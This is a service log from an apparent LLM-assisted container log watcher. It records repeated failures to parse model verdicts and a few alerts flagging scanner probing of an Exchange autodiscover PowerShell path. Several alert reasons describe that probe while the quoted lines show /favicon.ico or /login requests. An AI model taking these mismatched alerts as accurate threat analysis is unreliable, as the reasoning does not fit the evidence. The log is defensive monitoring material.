Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970596 [logwatch]   ✗ push/ios   → not configured (set APNS_KEY_PATH + APNS_DEVICE_TOKEN)
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970599 [logwatch]   ✗ push/fcm   → not configured (set FCM_CREDENTIALS_PATH + FCM_DEVICE_TOKEN)
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.970790 [observer] Starting container log watcher...
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977374 [watcher] Found 8 running containers
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977417 [watcher] Streaming logs for srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp (e9fbb6ab33ae)
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977545 [watcher] Streaming logs for captain-certbot.1.by454lfepw5mkzfa8e3karl8p (e1aa25883517)
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977613 [watcher] Streaming logs for srv-captain--media.1.td1ofal2g3beoqwzjiemvmuo4 (91c0395873e8)
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977545 [watcher] Streaming logs for srv-captain--login.1.ytr8xgjiz9apso2l6ipovyo42 (ec84599232e6)
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977699 [watcher] Streaming logs for captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo (9d722e5b66d0)
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977778 [watcher] Streaming logs for srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf (73fec0bbd4c4)
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977822 [watcher] Streaming logs for captain-captain.1.oqvny8g95v3neveijmxdmdgto (080568bcaf31)
Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977624 [watcher] Streaming logs for captain-netdata-container (974270844dff)
Mar 19 22:48:53 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:53.456645 [observer] LLM inference server connected
Mar 19 22:49:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:22.976974 [observer] Pipeline: processed=5 pattern_hits=2 llm_calls=2 llm_errors=0 learned=0
Mar 19 22:49:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:22.977006 [observer] Patterns: hash=2 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=3
Mar 19 22:49:28 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:28.290826 [llm] Failed to parse verdict from:
Mar 19 22:49:28 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:28.290866 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:49:28 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:28.290876 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:49:14.557232603Z 98.152.173.124 - - [19/Mar/2026:22:49:14 +0000] "api.admin.kovicloud....
Mar 19 22:49:33 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:33.551338 [llm] Failed to parse verdict from:
Mar 19 22:49:33 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:33.551376 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input
Mar 19 22:49:33 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:33.551385 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T22:49:14.558106005Z 10.0.1.9 - - [19/Mar/2026:22:49:14 +0000] "GET / HTTP/1.0" 200 34020 ...
Mar 19 22:49:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:44.380046 [llm] Failed to parse verdict from:
Mar 19 22:49:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:44.380080 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:49:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:44.380089 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:49:17.151124992Z 98.152.173.124 - - [19/Mar/2026:22:49:17 +0000] "captain.admin.kovicl...
Mar 19 22:49:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:50.010918 [llm] Failed to parse verdict from:
Mar 19 22:49:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:50.010955 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input
Mar 19 22:49:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:50.010964 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T22:49:20.984517857Z 10.0.1.9 - - [19/Mar/2026:22:49:20 +0000] "GET / HTTP/1.0" 200 34020 ...
Mar 19 22:49:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:52.976383 [observer] Pipeline: processed=8 pattern_hits=2 llm_calls=5 llm_errors=4 learned=0
Mar 19 22:49:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:52.976412 [observer] Patterns: hash=2 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6
Mar 19 22:49:59 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:59.841489 [llm] Failed to parse verdict from:
Mar 19 22:49:59 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:59.841535 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:49:59 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:59.841546 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:49:20.985007038Z 98.152.173.124 - - [19/Mar/2026:22:49:20 +0000] "api.admin.kovicloud....
Mar 19 22:50:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:50:22.980466 [observer] Pipeline: processed=16 pattern_hits=10 llm_calls=5 llm_errors=5 learned=0
Mar 19 22:50:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:50:22.980491 [observer] Patterns: hash=10 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6
Mar 19 22:50:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:50:52.992998 [observer] Pipeline: processed=18 pattern_hits=12 llm_calls=5 llm_errors=5 learned=0
Mar 19 22:50:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:50:52.993024 [observer] Patterns: hash=12 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6
Mar 19 22:51:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:51:22.978351 [observer] Pipeline: processed=22 pattern_hits=16 llm_calls=5 llm_errors=5 learned=0
Mar 19 22:51:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:51:22.978374 [observer] Patterns: hash=16 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6
Mar 19 22:51:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:51:52.989486 [observer] Pipeline: processed=24 pattern_hits=18 llm_calls=5 llm_errors=5 learned=0
Mar 19 22:51:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:51:52.989525 [observer] Patterns: hash=18 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6
Mar 19 22:52:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:52:22.976963 [observer] Pipeline: processed=28 pattern_hits=22 llm_calls=5 llm_errors=5 learned=0
Mar 19 22:52:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:52:22.976993 [observer] Patterns: hash=22 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6
Mar 19 22:52:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:52:52.978618 [observer] Pipeline: processed=30 pattern_hits=24 llm_calls=5 llm_errors=5 learned=0
Mar 19 22:52:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:52:52.978643 [observer] Patterns: hash=24 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6
Mar 19 22:53:10 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:10.318916 [llm] Failed to parse verdict from:
Mar 19 22:53:10 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:10.318953 [analyzer] LLM error for docker:captain-netdata-container: parsing verdict: unexpected end of JSON input
Mar 19 22:53:10 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:10.318963 [LLM_ERROR] Source=docker:captain-netdata-container Line=2026-03-19T22:52:56.677226540Z 2026-03-19 22:52:56: netdata INFO  : MAIN : Creating new data and jou...
Mar 19 22:53:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:22.976606 [observer] Pipeline: processed=36 pattern_hits=28 llm_calls=7 llm_errors=6 learned=0
Mar 19 22:53:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:22.976637 [observer] Patterns: hash=28 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=8
Mar 19 22:53:24 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:24.168430 [llm] Failed to parse verdict from:
Mar 19 22:53:24 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:24.168470 [analyzer] LLM error for docker:captain-netdata-container: parsing verdict: unexpected end of JSON input
Mar 19 22:53:24 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:24.168482 [LLM_ERROR] Source=docker:captain-netdata-container Line=2026-03-19T22:52:56.681517796Z 2026-03-19 22:52:56: netdata INFO  : MAIN : Created data file "/var/c...
Mar 19 22:53:38 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:38.597274 [llm] Failed to parse verdict from:
Mar 19 22:53:38 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:38.597312 [analyzer] LLM error for docker:captain-netdata-container: parsing verdict: unexpected end of JSON input
Mar 19 22:53:38 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:38.597321 [LLM_ERROR] Source=docker:captain-netdata-container Line=2026-03-19T22:52:56.682665133Z 2026-03-19 22:52:56: netdata INFO  : MAIN : Created journal file "/va...
Mar 19 22:53:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:52.978630 [observer] Pipeline: processed=39 pattern_hits=30 llm_calls=8 llm_errors=8 learned=0
Mar 19 22:53:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:52.978655 [observer] Patterns: hash=30 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=9
Mar 19 22:54:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:54:22.990842 [observer] Pipeline: processed=41 pattern_hits=32 llm_calls=8 llm_errors=8 learned=0
Mar 19 22:54:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:54:22.990870 [observer] Patterns: hash=32 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=9
Mar 19 22:54:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:54:52.974959 [observer] Pipeline: processed=45 pattern_hits=36 llm_calls=8 llm_errors=8 learned=0
Mar 19 22:54:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:54:52.974987 [observer] Patterns: hash=36 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=9
Mar 19 22:55:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:55:22.977149 [observer] Pipeline: processed=49 pattern_hits=40 llm_calls=8 llm_errors=8 learned=0
Mar 19 22:55:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:55:22.977196 [observer] Patterns: hash=40 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=9
Mar 19 22:55:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:55:52.975774 [observer] Pipeline: processed=53 pattern_hits=44 llm_calls=8 llm_errors=8 learned=0
Mar 19 22:55:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:55:52.975798 [observer] Patterns: hash=44 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=9
Mar 19 22:56:08 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:08.330781 [llm] Failed to parse verdict from:
Mar 19 22:56:08 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:08.330817 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:56:08 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:08.330826 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:55:53.168546820Z 66.132.172.110 - - [19/Mar/2026:22:55:53 +0000] "54.200.221.0" "GET /...
Mar 19 22:56:21 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:21.877907 [llm] Failed to parse verdict from:
Mar 19 22:56:21 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:21.877942 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:56:21 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:21.877952 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:55:54.756417913Z 2026/03/19 22:55:54 [error] 422#422: *741982 open() "/usr/share/nginx...
Mar 19 22:56:21 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:21.878000 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-19T22:55:54.756588180Z 66.132.172.110 - - [19/Mar/2026:22:55:54 +0000] "54.200.221.0" "GET /favicon.ico HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censy...
Mar 19 22:56:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:22.976364 [observer] Pipeline: processed=58 pattern_hits=47 llm_calls=10 llm_errors=10 learned=0
Mar 19 22:56:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:22.976390 [observer] Patterns: hash=47 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=11
Mar 19 22:56:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:52.975119 [observer] Pipeline: processed=62 pattern_hits=51 llm_calls=10 llm_errors=10 learned=0
Mar 19 22:56:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:52.975148 [observer] Patterns: hash=51 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=11
Mar 19 22:57:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:22.975994 [observer] Pipeline: processed=64 pattern_hits=53 llm_calls=10 llm_errors=10 learned=0
Mar 19 22:57:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:22.976023 [observer] Patterns: hash=53 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=11
Mar 19 22:57:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:44.585704 [llm] Failed to parse verdict from:
Mar 19 22:57:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:44.585740 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input
Mar 19 22:57:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:44.585748 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T22:57:29.360581888Z 10.0.1.9 - - [19/Mar/2026:22:57:29 +0000] "GET / HTTP/1.0" 200 34020 ...
Mar 19 22:57:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:44.741698 [llm] Failed to parse verdict from:
Mar 19 22:57:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:44.741734 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:57:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:44.741743 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:57:29.360414317Z 178.156.254.40 - - [19/Mar/2026:22:57:29 +0000] "api.admin.kovicloud....
Mar 19 22:57:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:52.975794 [observer] Pipeline: processed=68 pattern_hits=55 llm_calls=12 llm_errors=12 learned=0
Mar 19 22:57:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:52.975821 [observer] Patterns: hash=55 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=13
Mar 19 22:58:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:22.975077 [observer] Pipeline: processed=72 pattern_hits=59 llm_calls=12 llm_errors=12 learned=0
Mar 19 22:58:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:22.975102 [observer] Patterns: hash=59 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=13
Mar 19 22:58:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:50.177638 [llm] Failed to parse verdict from:
Mar 19 22:58:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:50.177740 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:58:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:50.177753 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:58:32.891039298Z 2026/03/19 22:58:32 [error] 422#422: *742010 open() "/usr/share/nginx...
Mar 19 22:58:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:50.177802 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-19T22:58:32.891128707Z 66.132.172.110 - - [19/Mar/2026:22:58:32 +0000] "54.200.221.0" "GET /login HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)...
Mar 19 22:58:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:52.975331 [observer] Pipeline: processed=76 pattern_hits=62 llm_calls=13 llm_errors=13 learned=0
Mar 19 22:58:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:52.975351 [observer] Patterns: hash=62 prefix=0 regex=0 contains=0 deny=2 alert=0 suppress=0 misses=14
Mar 19 22:59:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:59:22.976027 [observer] Pipeline: processed=80 pattern_hits=66 llm_calls=13 llm_errors=13 learned=0
Mar 19 22:59:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:59:22.976050 [observer] Patterns: hash=66 prefix=0 regex=0 contains=0 deny=2 alert=0 suppress=0 misses=14
Mar 19 22:59:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:59:52.975486 [observer] Pipeline: processed=82 pattern_hits=68 llm_calls=13 llm_errors=13 learned=0
Mar 19 22:59:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:59:52.975512 [observer] Patterns: hash=68 prefix=0 regex=0 contains=0 deny=2 alert=0 suppress=0 misses=14
Mar 19 23:00:17 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:17.385510 [llm] Failed to parse verdict from:
Mar 19 23:00:17 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:17.385654 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:00:17 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:17.385669 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:00:01.159974117Z 167.94.138.200 - - [19/Mar/2026:23:00:01 +0000] "54.200.221.0" "GET /...
Mar 19 23:00:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:22.976406 [observer] Pipeline: processed=86 pattern_hits=70 llm_calls=15 llm_errors=14 learned=0
Mar 19 23:00:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:22.976434 [observer] Patterns: hash=70 prefix=0 regex=0 contains=0 deny=2 alert=0 suppress=0 misses=16
Mar 19 23:00:33 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:33.923037 [llm] Failed to parse verdict from:
Mar 19 23:00:33 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:33.923079 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:00:33 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:33.923088 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:00:01.566272536Z 2026/03/19 23:00:01 [error] 422#422: *742028 open() "/usr/share/nginx...
Mar 19 23:00:33 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:33.923135 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-19T23:00:01.566449139Z 167.94.138.200 - - [19/Mar/2026:23:00:01 +0000] "54.200.221.0" "GET /favicon.ico HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censy...
Mar 19 23:00:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:50.443396 [llm] Failed to parse verdict from:
Mar 19 23:00:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:50.443443 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:00:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:50.443453 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:00:10.139441969Z 2026/03/19 23:00:10 [error] 422#422: *742033 open() "/usr/share/nginx...
Mar 19 23:00:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:50.443672 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-19T23:00:10.139481386Z 167.94.138.200 - - [19/Mar/2026:23:00:10 +0000] "54.200.221.0" "GET /login HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)...
Mar 19 23:00:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:52.976855 [observer] Pipeline: processed=95 pattern_hits=78 llm_calls=16 llm_errors=16 learned=0
Mar 19 23:00:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:52.976881 [observer] Patterns: hash=78 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=17
Mar 19 23:01:13 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:01:13.851636 [llm] Failed to parse verdict from:
Mar 19 23:01:13 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:01:13.851677 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:01:13 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:01:13.851685 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:00:57.335934532Z 93.174.93.12 - - [19/Mar/2026:23:00:57 +0000] "_" "\x16\x03\x02\x01o\...
Mar 19 23:01:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:01:22.976957 [observer] Pipeline: processed=98 pattern_hits=80 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:01:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:01:22.976981 [observer] Patterns: hash=80 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:01:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:01:52.975793 [observer] Pipeline: processed=102 pattern_hits=84 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:01:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:01:52.975819 [observer] Patterns: hash=84 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:02:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:02:22.975007 [observer] Pipeline: processed=104 pattern_hits=86 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:02:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:02:22.975034 [observer] Patterns: hash=86 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:02:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:02:52.976372 [observer] Pipeline: processed=108 pattern_hits=90 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:02:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:02:52.976402 [observer] Patterns: hash=90 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:03:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:03:22.975018 [observer] Pipeline: processed=110 pattern_hits=92 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:03:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:03:22.975041 [observer] Patterns: hash=92 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:03:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:03:52.975027 [observer] Pipeline: processed=114 pattern_hits=96 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:03:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:03:52.975054 [observer] Patterns: hash=96 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:04:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:04:22.976118 [observer] Pipeline: processed=116 pattern_hits=98 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:04:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:04:22.976143 [observer] Patterns: hash=98 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:04:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:04:52.976003 [observer] Pipeline: processed=118 pattern_hits=100 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:04:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:04:52.976028 [observer] Patterns: hash=100 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:05:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:05:22.974925 [observer] Pipeline: processed=122 pattern_hits=104 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:05:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:05:22.975460 [observer] Patterns: hash=104 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:05:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:05:52.977009 [observer] Pipeline: processed=126 pattern_hits=108 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:05:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:05:52.977035 [observer] Patterns: hash=108 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:06:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:06:22.975052 [observer] Pipeline: processed=130 pattern_hits=112 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:06:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:06:22.975080 [observer] Patterns: hash=112 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:06:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:06:52.978347 [observer] Pipeline: processed=132 pattern_hits=114 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:06:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:06:52.978374 [observer] Patterns: hash=114 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:07:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:07:22.975768 [observer] Pipeline: processed=136 pattern_hits=118 llm_calls=17 llm_errors=17 learned=0
